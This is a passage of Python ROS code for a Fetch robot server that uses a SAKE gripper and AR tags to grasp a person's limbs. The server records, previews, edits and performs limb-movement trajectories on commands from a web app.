"right arm elbow extension": "RAEE", "right arm elbow flexion": "RAEF",
"left arm elbow extension": "LAEE", "left arm elbow flexion": "LAEF"
}
# leg medial rotation, leg lateral rotation
# shoulder flexion, shoulder abduction, shoulder adduction, shoulder medial rotation, shoulder lateral rotation,
# forearm pronation, forearm supination,
# knee flexion, knee extension (seems to be performed when seated?)
def wait_for_time():
"""
Wait for simulated time to begin.
"""
while rospy.Time().now().to_sec() == 0:
pass
class ArTagReader(object):
def __init__(self):
self.markers = [] # list of markers (update in real time)
self.saved_markers = [] # list of markers saved (update only if update() is called)
def callback(self, msg):
self.markers = msg.markers
def update(self):
self.saved_markers = self.markers
def get_tag(self, tag):
""" Returns the marker with id# == tag """
for marker in self.saved_markers:
if marker.id == int(tag):
result = PoseStamped()
result.pose = marker.pose
result.header = marker.header
return result
return None
def get_list(self):
""" Returns the list of saved markers """
return self.saved_markers
class PbdServer():
""" Server for PBD """
def __init__(self):
# controls of Fetch
self._arm = fetch_api.Arm()
self._arm_joints = fetch_api.ArmJoints()
self._torso = fetch_api.Torso()
self._head = fetch_api.Head()
self._base = fetch_api.Base()
self._fetch_gripper = fetch_api.Gripper()
# status of the arm: relax or freeze
self._arm_relaxed = False
# transformation
self._tf_listener = tf.TransformListener()
rospy.sleep(0.1)
# AR tag reader
self._reader = ArTagReader()
self._ar_sub = rospy.Subscriber("ar_pose_marker", AlvarMarkers, callback=self._reader.callback)
# database of actions
self._db = Database()
self._db.load()
# publisher and subscriber for controls of SAKE gripper
self._sake_gripper_pub = rospy.Publisher('/ezgripper_access', EzgripperAccess, queue_size=1)
self._sake_gripper_sub = rospy.Subscriber('/ezgripper_access_status', EzgripperAccess, callback=self._set_sake_gripper_action_status)
# moveit: query controller
self._controller_client = actionlib.SimpleActionClient('/query_controller_states', QueryControllerStatesAction)
# moveit: move group commander
moveit_commander.roscpp_initialize(sys.argv)
moveit_robot = moveit_commander.RobotCommander()
self._moveit_group = moveit_commander.MoveGroupCommander('arm')
# motion planning scene
self._planning_scene = PlanningSceneInterface('base_link')
self._planning_scene.clear()
# visualization
self._viz_pub = rospy.Publisher('visualization_marker', Marker, queue_size=5)
self._viz_markers_pub = rospy.Publisher('visualization_marker_array', MarkerArray, queue_size=5)
# initial position of robot arm
self._arm_initial_poses = [
("shoulder_pan_joint", 1.296), ("shoulder_lift_joint", 1.480), ("upperarm_roll_joint", -0.904), ("elbow_flex_joint", 2.251),
("forearm_roll_joint", -2.021), ("wrist_flex_joint", -1.113), ("wrist_roll_joint", -0.864)]
# orientation constraint (unused)
self._gripper_oc = OrientationConstraint()
self._gripper_oc.header.frame_id = 'base_link'
self._gripper_oc.link_name = 'wrist_roll_link'
self._gripper_oc.orientation.z = -0.707
self._gripper_oc.orientation.w = 0.707
self._gripper_oc.absolute_x_axis_tolerance = 0.1
self._gripper_oc.absolute_y_axis_tolerance = 0.1
self._gripper_oc.absolute_z_axis_tolerance = 3.14
self._gripper_oc.weight = 1.0
# moveit args
self._kwargs = {
'allowed_planning_time': 30,
'execution_timeout': 15,
'group_name': 'arm',
'num_planning_attempts': 10,
# 'orientation_constraint': self._gripper_oc,
'replan': True,
'replan_attempts': 5,
'tolerance': 0.01
}
# current pose of gripper (used in performing actions)
self._current_pose = None
# bag file directory
script_path = os.path.abspath(__file__)
self._bag_file_dir = os.path.split(script_path)[0][:-4] + '/bags'
# subscriber and publisher for frontend
self._web_app_request_sub = rospy.Subscriber("web_app_request", WebAppRequest, callback=self.web_app_request_callback)
self._web_app_response_pub = rospy.Publisher('web_app_response', WebAppResponse, queue_size=5)
# variables representing the program state
self._sake_gripper_attached = False
self._sake_gripper_action_finished = False
self._sake_gripper_effort = "100"
self._robot_stopped = False
self._grasp_position_ready = False
self._grasp_type = "h_close"
self._do_position_ready = False
self._do_position_id = -1
self._preview_action_abbr = ""
self._preview_traj = [] # the trajectory being previewed currently
self._current_waypoint_id = -1
rospy.sleep(0.5)
def setup(self):
""" Handler for robot set up """
print("\nSetting up everything, please wait...\n")
# set robot's initial state
self._torso.set_height(0)
self._head.pan_tilt(0, 0.8)
# move arm to the initial position (with collision detection)
self._arm.move_to_joint_goal(self._arm_initial_poses, replan=True)
print("\nThe program is ready to use :-)\n")
def shutdown(self):
""" Handler for robot shutdown """
print("\nShutting down... Bye :-)\n")
# clear display
self._viz_markers_pub.publish(MarkerArray(markers=[]))
# moveit
self.freeze_arm()
self._planning_scene.clear()
self._arm.cancel_all_goals()
# save the database
self._db.save()
# moveit: move group commander
self._moveit_group.stop()
moveit_commander.roscpp_shutdown()
def attach_sake_gripper(self):
"""
Attaches SAKE gripper to Fetch's gripper, and updates the planning scene.
"""
self.freeze_arm()
# attach SAKE gripper to Fetch's gripper
self._fetch_gripper.open() # make sure Fetch's gripper is open
self._fetch_gripper.close()
self._sake_gripper_attached = True
# add SAKE gripper to the planning scene
frame_attached_to = 'gripper_link'
frames_okay_to_collide_with = ['gripper_link', 'l_gripper_finger_link', 'r_gripper_finger_link']
package_path = subprocess.check_output("rospack find ezgripper_driver", shell=True).replace('\n','')
if rospy.get_param("use_urdf"): # use real sake gripper mesh
# palm
sake_palm_pose = Pose(Point(-0.01, 0, 0.05), Quaternion(-0.7, 0, 0.7, 0))
sake_palm_mesh_file = package_path + "/meshes/visual/SAKE_Palm_Dual.stl"
self._planning_scene.attachMesh('sake_palm', sake_palm_pose, sake_palm_mesh_file,
frame_attached_to, touch_links=frames_okay_to_collide_with)
# fingers
sake_finger_1_pose = Pose(Point(0, -0.03, -0.055), Quaternion(0.5, -0.5, 0.5, 0.5))
sake_finger_1_mesh_file = package_path + "/meshes/visual/SAKE_Finger.stl"
self._planning_scene.attachMesh('sake_finger_1', sake_finger_1_pose, sake_finger_1_mesh_file,
frame_attached_to, touch_links=frames_okay_to_collide_with)
sake_finger_2_pose = Pose(Point(0, 0.03, -0.055), Quaternion(-0.5, -0.5, -0.5, 0.5))
sake_finger_2_mesh_file = package_path + "/meshes/visual/SAKE_Finger.stl"
self._planning_scene.attachMesh('sake_finger_2', sake_finger_2_pose, sake_finger_2_mesh_file,
frame_attached_to, touch_links=frames_okay_to_collide_with)
else: # use a box to represent the sake gripper
self._planning_scene.attachBox('sake', 0.03, 0.09, 0.15, 0, 0, -0.05,
frame_attached_to,
frames_okay_to_collide_with)
self._planning_scene.setColor('sake', 1, 0, 1)
self._planning_scene.sendColors()
# calibrate SAKE gripper
self.do_sake_gripper_action("calibrate")
def remove_sake_gripper(self):
"""
Removes SAKE gripper from Fetch's gripper, and updates the planning scene.
"""
self.freeze_arm()
# remove SAKE gripper from Fetch's gripper
self._fetch_gripper.close() # make sure Fetch's gripper is close
self._fetch_gripper.open()
self._sake_gripper_attached = False
# remove SAKE gripper from the planning scene
if rospy.get_param("use_urdf"):
self._planning_scene.removeAttachedObject('sake_palm')
self._planning_scene.removeAttachedObject('sake_finger_1')
self._planning_scene.removeAttachedObject('sake_finger_2')
else:
self._planning_scene.removeAttachedObject('sake')
def update_env(self, update_octo=True):
"""
Updates the list of markers, and scan the surroundings to build an octomap.
Returns false if the update fails, true otherwise.
"""
# update markers
self._reader.update()
# update octomap
if update_octo:
# clear previous octomap
if not self._clear_octomap():
return False
# scan the range: pan -0.75~0.75, tilt 0~0.7
for i in range(6):
pan = -0.75 + 0.25 * i
self._head.pan_tilt(pan, 0)
rospy.sleep(2)
self._head.pan_tilt(pan, 0.7)
rospy.sleep(2)
self._head.pan_tilt(pan, 0)
# move the head back to initial position
self._head.pan_tilt(0, 0.7)
return True
def do_sake_gripper_action(self, command):
# publish response message
if command == "calibrate":
self._publish_server_response(msg="Calibrating SAKE gripper, please wait...")
elif command == "h_close":
self._publish_server_response(msg="Hard closing SAKE gripper, please wait...")
elif command == "s_close":
self._publish_server_response(msg="Soft closing SAKE gripper, please wait...")
elif command == "open":
self._publish_server_response(msg="Opening SAKE gripper, please wait...")
else: # [percentage open, effort]
self._publish_server_response(msg="Closing SAKE gripper, please wait...")
# publish command
self._sake_gripper_pub.publish(EzgripperAccess(type=command))
# wait for the action to finish if in real
if not rospy.get_param("use_sim"):
while not self._sake_gripper_action_finished:
continue
# finished, reset
self._sake_gripper_action_finished = False
def reset(self):
""" Moves arm to its initial position and calibrates gripper """
self.freeze_arm()
self._arm.move_to_joint_goal(self._arm_initial_poses, replan=True)
self.do_sake_gripper_action("calibrate")
self._robot_stopped = False
self._reset_program_state()
def estop(self):
""" Emergency stop. """
self.relax_arm()
self._robot_stopped = True
self._reset_program_state()
def preview_body_part_with_id(self, id_num):
"""
Publishes visualization markers to mark the body part with given id.
"""
raw_pose = self._get_tag_with_id(id_num)
if raw_pose is not None:
# visualize goal pose
marker = Marker(type=Marker.CUBE,
id=0,
pose=raw_pose.pose.pose,
scale=Vector3(0.06, 0.06, 0.06),
header=raw_pose.header,
color=ColorRGBA(1.0, 0.75, 0.3, 0.8))
self._viz_pub.publish(marker)
def goto_part_with_id(self, id_num):
"""
Moves arm above a body part specified by id_num.
Returns true if succeed, false otherwise.
"""
self.freeze_arm()
raw_pose = self._get_tag_with_id(id_num)
if raw_pose is not None:
# found marker, move towards it
self.do_sake_gripper_action("40 " + self._sake_gripper_effort)
# OPTION 1: pregrasp ---> grasp
# highlight and move to the pre-grasp pose
pre_grasp_offset = self._db.get("PREGRASP")
pre_grasp_pose = self._move_arm_relative(raw_pose.pose.pose, raw_pose.header, offset=pre_grasp_offset, preview_only=True)
self.highlight_waypoint(pre_grasp_pose, WAYPOINT_HIGHLIGHT_COLOR)
if self._move_arm(pre_grasp_pose, final_state=False):
# highlight and move to the grasp pose, clear octomap to ignore collision only at this point
if self._clear_octomap():
return self._move_arm(self._get_goto_pose(raw_pose), final_state=False, seed_state=self._get_seed_state())
# # OPTION 2: grasp
# return self._move_arm(self._get_goto_pose(raw_pose), final_state=False)
# marker with id_num is not found, or some error occured
return False
def preview_action_with_abbr(self, abbr, id_num):
"""
Publishes visualization markers to preview waypoints on the trajectory with given abbr.
Saves waypoints extracted from bag file to database if the entry "abbr" doesn't exist.
Returns the colors of waypoints with respect to the ar tag. Records the positions of
waypoints with respect to the ar tag.
"""
# clear previous markers
self._viz_markers_pub.publish(MarkerArray(markers=[]))
# check the database for the action
waypoints = self._db.get(abbr)
if waypoints == None or len(waypoints) == 0:
waypoints = self._save_traj_to_db(abbr, id_num)
self._preview_action_abbr = ""
self._preview_traj = []
waypoints_with_respect_to_tag = []
if waypoints:
raw_pose = self._get_tag_with_id(id_num)
if raw_pose is not None:
prev_pose = self._get_goto_pose(raw_pose)
# markers
marker_arr = []
# marker color gradient
colors = list(START_COLOR.range_to(END_COLOR, len(waypoints)))
# visualize the trajectory
for i in range(len(waypoints)):
# visualize the current waypoint
marker = Marker(type=Marker.ARROW,
id=i,
pose=prev_pose.pose,
scale=TRAJ_HIGHLIGHT_SCALE,
header=prev_pose.header,
color=ColorRGBA(colors[i].red, colors[i].green, colors[i].blue, 0.8))
marker_arr.append(marker)
# record the waypoint
waypoints_with_respect_to_tag.append(str(colors[i].hex))
self._preview_traj.append(prev_pose)
if i < len(waypoints) - 1:
# calculate offset between the current point on the trajectory and the next point
r_pos = waypoints[i].pose # current point
r_mat = self._pose_to_transform(r_pos)
w_mat = self._pose_to_transform(waypoints[i + 1].pose)
offset = np.dot(np.linalg.inv(r_mat), w_mat)
prev_pose = self._move_arm_relative(prev_pose.pose, prev_pose.header, offset=offset, preview_only=True)
# publish new markers
self._viz_markers_pub.publish(MarkerArray(markers=marker_arr))
# record the action name
self._preview_action_abbr = abbr
return waypoints_with_respect_to_tag
def highlight_waypoint(self, highlight_pose, color):
""" Publishes a marker at the specified location. """
marker = Marker(type=Marker.ARROW,
id=0,
pose=highlight_pose.pose,
scale=WAYPOINT_HIGHLIGHT_SCALE,
header=highlight_pose.header,
color=color)
self._viz_pub.publish(marker)
def edit_waypoint(self, waypoint_id, delta_x, delta_y, camera):
""" Temporarily saves the changes to the specified waypoint, and highlights the resulting pose. """
# calculate the resulting pose
new_pose = self._compute_pose_by_delta(self._preview_traj[waypoint_id], delta_x, delta_y, camera)
# save the new pose
self._preview_traj[waypoint_id] = new_pose
# preview the new trajectory
marker_arr = []
# marker color gradient
colors = list(START_COLOR.range_to(END_COLOR, len(self._preview_traj)))
# visualize the trajectory
for i in range(len(self._preview_traj)):
# highlight the waypoint that is being editing
color = WAYPOINT_HIGHLIGHT_COLOR if i == waypoint_id else ColorRGBA(colors[i].red, colors[i].green, colors[i].blue, 0.8)
marker = Marker(type=Marker.ARROW,
id=i,
pose=self._preview_traj[i].pose,
scale=TRAJ_HIGHLIGHT_SCALE,
header=self._preview_traj[i].header,
color=color)
marker_arr.append(marker)
# clear previous markers
self._viz_markers_pub.publish(MarkerArray(markers=[]))
# publish new markers
self._viz_markers_pub.publish(MarkerArray(markers=marker_arr))
def modify_traj_in_db(self, cancel_change=True):
""" Overwrites the previous trajectory in database. """
if not cancel_change:
self._db.delete(self._preview_action_abbr)
self._db.add(self._preview_action_abbr, self._preview_traj)
self._preview_action_abbr = ""
self._preview_traj = []
def do_action_with_abbr(self, abbr, id_num):
"""
Moves arm to perform the action specified by abbr, save the trajectory to database if neccessary.
Returns true if succeed, false otherwise.
"""
action_result = False
if self._prepare_action(abbr, id_num):
action_result = self._follow_traj_step_by_step(0)
return action_result
def do_action_with_abbr_smooth(self, abbr, id_num):
"""
Moves arm to perform the action specified by abbr smoothly.
Returns true if succeed, false otherwise.
"""
action_result = False
if self._prepare_action(abbr, id_num):
# calculate a smooth trajectory passing through all the waypoints and move the arm
action_result = self._move_arm(None, trajectory_waypoint=self._preview_traj, final_state=True, seed_state=self._get_seed_state())
if not action_result:
# smooth action fails, do the action step by step instead
action_result = self._follow_traj_step_by_step(0)
return action_result
def pause_action(self):
""" Pause the current action. """
# self.relax_arm()
print(self._current_waypoint_id)
def continue_action(self):
""" Continue the current action. """
# self.freeze_arm()
print(self._current_waypoint_id)
# if self._current_waypoint_id > -1:
# # continue going to the next waypoint
# self._follow_traj_step_by_step(self._current_waypoint_id + 1)
def record_action_with_abbr(self, abbr, id_num):
"""
Records the pose offset named abbr relative to tag, always overwrites the previous entry (if exists).
Returns true if succeeds, false otherwise.
"""
# get tag pose
tag_pose = self._get_tag_with_id(id_num)
if tag_pose == None:
return False
# get the pose to be recorded: transformation lookup
(position, quaternion) = self._tf_lookup()
if (position, quaternion) == (None, None):
return False
# get the transformation, record it
record_pose = Pose()
record_pose.position.x = position[0]
record_pose.position.y = position[1]
record_pose.position.z = position[2]
record_pose.orientation.x = quaternion[0]
record_pose.orientation.y = quaternion[1]
record_pose.orientation.z = quaternion[2]
record_pose.orientation.w = quaternion[3]
# get the offset between the tag pose and the pose to be recorded
t_pos = tag_pose.pose.pose
t_mat = self._pose_to_transform(t_pos)
w_mat = self._pose_to_transform(record_pose)
offset = np.dot(np.linalg.inv(t_mat), w_mat)
# add the offset to database
self._db.add(abbr, offset)
self._db.save()
return True
def relax_arm(self):
""" Relax the robot arm, if the program is running on the real robot """
if not rospy.get_param("use_sim") and not self._arm_relaxed:
goal = QueryControllerStatesGoal()
state = ControllerState()
state.name = 'arm_controller/follow_joint_trajectory'
state.state = ControllerState.STOPPED
goal.updates.append(state)
self._controller_client.send_goal(goal)
self._controller_client.wait_for_result()
self._arm_relaxed = True
def freeze_arm(self):
""" Freeze the robot arm, if the program is running on the real robot """
if not rospy.get_param("use_sim") and self._arm_relaxed:
goal = QueryControllerStatesGoal()
state = ControllerState()
state.name = 'arm_controller/follow_joint_trajectory'
state.state = ControllerState.RUNNING
goal.updates.append(state)
self._controller_client.send_goal(goal)
self._controller_client.wait_for_result()
self._arm_relaxed = False
def get_list(self):
""" Returns a list of AR tags recognized by the robot. """
return self._reader.get_list()
def get_db_list(self):
""" Returns list of entries in the database. """
return self._db.list()
def get_db_entry(self, entry):
""" Returns values associated with the given entry in the database. """
return self._db.get(entry)
def delete_db_entry(self, name):
""" Delete the database entry with the given name """
self._db.delete(name)
self._db.save()
def web_app_request_callback(self, msg):
"""
Parse the request given by the wee application, and call the corresponding functions.
"""
request_type, request_args = msg.type, msg.args
print("type: " + request_type)
print("args: " + str(request_args) + "\n")
if request_type == "attach":
return_msg = "SAKE gripper has already attached!"
if not self._sake_gripper_attached:
self._publish_server_response(msg="Attaching SAKE gripper...")
self.attach_sake_gripper()
return_msg = "SAKE gripper attached"
self._publish_server_response(status=True, msg=return_msg)
elif request_type == "remove":
return_msg = "SAKE gripper has already removed!"
if self._sake_gripper_attached:
self._publish_server_response(msg="Removing SAKE gripper...")
self.remove_sake_gripper()
return_msg = "SAKE gripper removed"
self._publish_server_response(status=True, msg=return_msg)
elif not self._sake_gripper_attached:
# need to attach SAKE gripper first
self._publish_server_response(status=True, msg="Please attach SAKE gripper first!")
else:
# SAKE gripper has already attached
if request_type == "record":
self._publish_server_response(msg="Recording the current scene...")
if self.update_env(update_octo=bool(request_args[0])):
# get the list of body parts and actions
parts = self.get_list()
parts_info, actions_info = [], []
if len(parts):
for part in parts:
if part.id in BODY_PARTS and part.id in ACTIONS:
parts_info.append(str(part.id) + ":" + BODY_PARTS[part.id])
for action in ACTIONS[part.id]:
actions_info.append(str(part.id) + ":" + action + ":" + ABBR[action])
self._publish_server_response(type="parts", args=parts_info)
self._publish_server_response(type="actions", status=True, args=actions_info, msg="Scene recorded")
else:
self._publish_server_response(status=True, msg="Failed to record the current scene!")
elif request_type == "prev_id" and len(request_args) == 1:
id_num = int(request_args[0]) # convert from string to int
self._publish_server_response(status=True, msg="Previewing " + BODY_PARTS[id_num] + "...")
self.preview_body_part_with_id(id_num)
elif request_type == "prev" and len(request_args) == 2:
abbr, id_num = request_args[0], int(request_args[1])
waypoints_with_respect_to_tag = self.preview_action_with_abbr(abbr, id_num)
self._publish_server_response(type=request_type, status=True, args=waypoints_with_respect_to_tag,
msg="Previewing the action with respect to body part " + BODY_PARTS[id_num] + "...")
elif request_type == "highlight" and len(request_args) == 1:
waypoint_id = int(request_args[0])
self.highlight_waypoint(self._preview_traj[waypoint_id], WAYPOINT_HIGHLIGHT_COLOR)
self._publish_server_response(status=True)
elif request_type == "edit" and len(request_args) == 4:
waypoint_id, delta_x, delta_y, camera = int(request_args[0]), int(request_args[1]), int(request_args[2]), request_args[3]
self.edit_waypoint(waypoint_id, delta_x, delta_y, camera)
self._publish_server_response(status=True)
elif request_type == "save_edit" or request_type == "cancel_edit":
if request_type == "save_edit":
self.modify_traj_in_db(cancel_change=False)
else:
self.modify_traj_in_db() # cancel all the changes
self._publish_server_response(status=True)
elif request_type == "reset":
self._publish_server_response(msg="Resetting...")
self.reset()
self._publish_server_response(status=True, msg="Done")
elif not self._robot_stopped:
# moveit controller is running
if request_type == "go" and len(request_args) == 1:
self._do_position_ready = False
id_num = int(request_args[0])
self._publish_server_response(msg="Moving towards body part " + BODY_PARTS[id_num] + "...")
if self.goto_part_with_id(id_num):
self._grasp_position_ready = True
self._do_position_id = id_num
self._publish_server_response(status=True, msg="Done, ready to grasp")
else:
self._publish_server_response(status=True, msg="Fail to move!")
elif request_type == "grasp" and self._grasp_position_ready and len(request_args) == 1:
self._publish_server_response(msg="Grasping...")
self._grasp_type = "h_close" if request_args[0] == "h" else "s_close"
self.do_sake_gripper_action(self._grasp_type)
self._grasp_position_ready = False
self._do_position_ready = True
self._publish_server_response(status=True, msg="Grasped")
elif request_type == "relax":
self._publish_server_response(msg="Relaxing arm...")
self.relax_arm()
self._publish_server_response(status=True, msg="Arm relaxed")
elif request_type == "freeze":
self._publish_server_response(msg="Freezing arm...")
self.freeze_arm()
self._publish_server_response(status=True, msg="Arm froze")
elif (request_type == "do" or request_type == "do_s") and len(request_args) > 0:
action_abbr = request_args[0]
return_msg = "Action failed!"
if self._do_position_ready:
# performing mode
self._publish_server_response(msg="Performing " + action_abbr + "...")
result = False
if request_type == "do": # step by step
result = self.do_action_with_abbr(action_abbr, self._do_position_id)
else: # "do_s": smooth
result = self.do_action_with_abbr_smooth(action_abbr, self._do_position_id)
if result:
return_msg = "Action succeeded"
else:
return_msg = "Unknown action for body part with ID: " + str(self._do_position_id)
# always release gripper
self._publish_server_response(msg="Releasing the gripper...")
self.do_sake_gripper_action("40 " + self._sake_gripper_effort)
self._do_position_ready = False
self._publish_server_response(status=True, msg=return_msg)
elif request_type == "open":
self._publish_server_response(msg="Opening the gripper...")
self.do_sake_gripper_action("open")
self._do_position_ready = False
self._publish_server_response(status=True, msg="Gripper opened")
elif request_type == "stop":
self._publish_server_response(msg="Stopping the robot...")
self.estop()
self._publish_server_response(status=True, msg="Robot stopped, please \"RESET\" if you want to continue using it")
elif request_type == "run" and len(request_args) == 3:
#######################################################################################
############## todo
# start execution from the currect step in the action trajectory
# start execution from the very beginning
self.web_app_request_callback(WebAppRequest(type="go", args=[request_args[0]]))
self.web_app_request_callback(WebAppRequest(type="grasp", args=[request_args[1]]))
self.web_app_request_callback(WebAppRequest(type="do_s", args=[request_args[2]]))
self._publish_server_response(type=request_type, status=True, msg="DONE")
elif request_type == "step":
return_msg = "Ready!"
waypoint_id = int(request_args[0])
if waypoint_id == -1: # goto tag and grasp
self.web_app_request_callback(WebAppRequest(type="go", args=[request_args[1]]))
self.web_app_request_callback(WebAppRequest(type="grasp", args=[request_args[2]]))
else: # move along trajectory
self._grasp_type = "h_close" if request_args[1] == "h" else "s_close"
return_msg = "Fail to reach waypoint #" + request_args[0]
result = self._goto_waypoint_on_traj_with_id(waypoint_id)
if waypoint_id == len(self._preview_traj) - 1: # last point
self._publish_server_response(msg="Releasing the gripper...")
self.do_sake_gripper_action("40 " + self._sake_gripper_effort)
self._do_position_ready = False
if result:
return_msg = "Reached waypoint #" + request_args[0]
self._publish_server_response(type=request_type, status=True, args=[request_args[0]], msg=return_msg)
elif request_type == "pause":
self._publish_server_response(msg="Pausing...")
self.pause_action()
self._publish_server_response(type=request_type, status=True, msg="PAUSED")
elif request_type == "continue":
self._publish_server_response(msg="Continuing...")
self.continue_action()
self._publish_server_response(type=request_type, status=True, msg="CONTINUED")
else:
self._publish_server_response(status=True, msg="Invalid command :)")
def _reset_program_state(self):
""" Resets program state. """
self._grasp_position_ready = False
self._do_position_ready = False
self._do_position_id = -1
def _clear_octomap(self):
""" Clears the octomap. Returns true if succeeds, false otherwise. """
rospy.wait_for_service('clear_octomap')
try:
clear_octo = rospy.ServiceProxy('clear_octomap', Empty)
clear_octo()
except rospy.ServiceException, e:
rospy.logerr('Fail clear octomap: {}'.format(e))
return False
return True
def _move_arm_relative(self, ref_pose, ref_header, offset=None, preview_only=False, seed_state=None):
"""
Calculates the coordinate of the goal by adding the offset to the given reference pose,
and moves the arm to the goal. If it's only for previewing, returns the goal pose,
else returns the result of the movement.
"""
goal_pose = PoseStamped()
goal_pose.header = ref_header
if offset is not None:
# current pose is valid, perform action
t_mat = self._pose_to_transform(ref_pose)
# compute the new coordinate
new_trans = np.dot(t_mat, offset)
pose = self._transform_to_pose(new_trans)
goal_pose.pose = pose
else:
goal_pose.pose = ref_pose
if preview_only:
return goal_pose
else:
# move to the goal position while avoiding unreasonable trajectories!
# close SAKE gripper again to ensure the limb is grasped
self.do_sake_gripper_action(self._grasp_type)
# visualize goal pose
self.highlight_waypoint(goal_pose, ColorRGBA(1.0, 1.0, 0.0, 0.8))
return goal_pose if self._move_arm(goal_pose, final_state=True, seed_state=seed_state) else None
def _move_arm(self, goal_pose, trajectory_waypoint=[], final_state=False, seed_state=None):
"""
Moves arm to the specified goal_pose. Returns true if succeed, false otherwise.
"""
error = None
if not final_state:
# simply go to the goal_pose
error = self._arm.move_to_pose_with_seed(goal_pose, seed_state, [], **self._kwargs)
# record the current pose because we still have the "do action" step to do
self._current_pose = goal_pose
else:
# go to goal_pose while avoiding unreasonable trajectories!
if trajectory_waypoint:
# create an array of waypoints
waypoints = []
for tw in trajectory_waypoint:
waypoints.append(tw.pose)
# using trajectory waypoints to perform a smooth motion
plan = self._arm.get_cartesian_path(self._moveit_group, seed_state, waypoints)
if plan:
error = self._arm.execute_trajectory(self._moveit_group, plan)
else:
error = 'PLANNING_FAILED'
else:
# using seed
error = self._arm.move_to_pose_with_seed(goal_pose, seed_state, [], **self._kwargs)
if error is not None:
# planning with seed failed, try without seed
# moveit: move group commander
# check if the pose can be reached in a straight line motion
plan = self._arm.straight_move_to_pose_check(self._moveit_group, goal_pose)
if plan:
error = self._arm.straight_move_to_pose(self._moveit_group, plan)
else:
error = 'PLANNING_FAILED'
# reset current pose to none
self._current_pose = None
if error is not None:
self._arm.cancel_all_goals()
rospy.logerr("Fail to move: {}".format(error))
return False
# succeed
return True
def _transform_to_pose(self, matrix):
""" Matrix to pose """
pose = Pose()
trans_vector = tft.translation_from_matrix(matrix)
pose.position = Point(trans_vector[0], trans_vector[1], trans_vector[2])
quartern = tft.quaternion_from_matrix(matrix)
pose.orientation = Quaternion(quartern[0], quartern[1], quartern[2], quartern[3])
return pose
def _pose_to_transform(self, pose):
""" Pose to matrix """
q = pose.orientation
matrix = tft.quaternion_matrix([q.x, q.y, q.z, q.w])
matrix[0, 3] = pose.position.x
matrix[1, 3] = pose.position.y
matrix[2, 3] = pose.position.z
return matrix
def _get_tag_with_id(self, id_num):
""" Returns the AR tag with the given id, returns None if id not found """
tag_pose = self._reader.get_tag(id_num)
if tag_pose == None:
rospy.logerr("AR tag lookup error: Invalid ID# " + str(id_num))
return tag_pose
def _tf_lookup(self):
"""
Lookups the transformation between "base_link" and "wrist_roll_link" (retry up to TRANSFROM_LOOKUP_RETRY times),
and returns the result
"""
(position, quaternion) = (None, None)
count = 0
while True:
if (position, quaternion) != (None, None): # lookup succeeds
return (position, quaternion)
elif count >= TRANSFROM_LOOKUP_RETRY: # exceeds maximum retry times
rospy.logerr("Fail to lookup transfrom information between 'base_link' and 'wrist_roll_link'")
return (None, None)
else: # try to lookup transform information
try:
(position, quaternion) = self._tf_listener.lookupTransform('base_link', 'wrist_roll_link', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
count += 1
continue
def _get_goto_pose(self, ar_pose):
"""
Calculates the grasp pose of gripper given the AR tag pose, returns the gripper pose.
"""
grasp_offset = self._db.get("GRASP")
goal_pose = self._move_arm_relative(ar_pose.pose.pose, ar_pose.header, offset=grasp_offset, preview_only=True)
self.highlight_waypoint(goal_pose, WAYPOINT_HIGHLIGHT_COLOR)
return goal_pose
def _prepare_action(self, abbr, id_num):
"""
Previews the action trajectory, moves robot arm to the starting position of the action and
grasps the limb. Returns true if succeeds, false otherwise.
"""
# preview action
self.preview_action_with_abbr(abbr, id_num)
# freeze arm for moveit
self.freeze_arm()
# get AR tag information
tag_pose = self._get_tag_with_id(id_num)
if tag_pose == None or self._current_pose == None:
return False
# move arm to the starting position relative to AR tag
if not self._preview_traj or not self.goto_part_with_id(id_num):
rospy.logerr("Fail to move to the starting position for action: " + abbr)
return False
return True
def _follow_traj_step_by_step(self, start_id):
"""
Follows the current trajectory step by step. Returns true if at least one waypoint is reached, false otherwise.
"""
succeed = False
for i in range(start_id, len(self._preview_traj) - 1):
goal_pose = self._preview_traj[i + 1]
# move arm relative to the previous pose (use seed), skip the current waypoint if the current action fails
action_result = self._move_arm_relative(goal_pose.pose, goal_pose.header, seed_state=self._get_seed_state())
# record the current waypoint id
self._current_waypoint_id = i + 1
# check action result
if action_result is not None:
succeed = True # the whole action succeeds if at least one pose is reached
else:
rospy.logerr("Fail to reach waypoint " + str(i + 1))
# action finished, reset the current waypoint
self._current_waypoint_id = -1
return succeed
def _goto_waypoint_on_traj_with_id(self, waypoint_id):
"""
Go to the specific waypoint on the trajectory. Returns true if succeeds, false otherwise.
"""
succeed = False
if -1 < waypoint_id < len(self._preview_traj):
goal_pose = self._preview_traj[waypoint_id]
action_result = self._move_arm_relative(goal_pose.pose, goal_pose.header, seed_state=self._get_seed_state())
if action_result is not None:
succeed = True
else:
rospy.logerr("Fail to reach waypoint " + str(i + 1))
return succeed
def _save_traj_to_db(self, abbr, id_num):
"""
Checks bag file for the trajectory with given abbr, calculate waypoints and save those points to the database.
Returns the calculated waypoints if succeed, none otherwise.
"""
# check bag files for the trajectory
bag_file_path = os.path.join(self._bag_file_dir, abbr.lower() + '.bag')
bag = rosbag.Bag(bag_file_path)
waypoints = []
prev_msg = []
# get the trajectory from bag file
for topic, msg, t in bag.read_messages(topics=['/joint_states']):
joint_state = list(msg.position[6:13])
if len(joint_state) != 0 and (len(prev_msg) == 0 or np.abs(np.sum(np.subtract(joint_state, prev_msg))) > rospy.get_param("arm_traj_threshold")):
prev_msg = joint_state
# use forward kinematics to find the wrist position
point = self._arm.compute_fk(msg)
if point:
# add the result position
waypoints.append(point[0])
bag.close()
if len(waypoints) < 2:
# this trajectory is empty because it only contains the starting point
rospy.logerr("Empty trajectory for action: " + abbr)
return None
# add the result position to database
self._db.add(abbr, waypoints)
self._db.save()
return waypoints
def _publish_server_response(self, type="", status=False, args=[], msg=""):
""" Publishes the server response message, and prints the message in console if needed. """
if rospy.get_param("console_output"):
print(msg)
self._web_app_response_pub.publish(WebAppResponse(type=type, status=status, args=args, msg=msg))
def _compute_pose_by_delta(self, current_pose, delta_x, delta_y, camera):
"""
Computes and returns the new pose with respect to base_link after applying
delta_x and delta_y to the current pose in the specified camera view.
"""
x_distance, y_distance = dpx_to_distance(delta_x, delta_y, camera, current_pose, True)
return delta_modified_stamped_pose(x_distance, y_distance, camera, current_pose)
def _get_seed_state(self):
""" Returns the current arm joint state as the seed used in motion planning. """
seed_state = JointState()
seed_state.name = self._arm_joints.names()
seed_state.position = self._arm_joints.values()
return seed_state
def _set_sake_gripper_action_status(self, msg):
""" This is the callback of sake gripper status. """
self._sake_gripper_action_finished = True
```
|
[
{
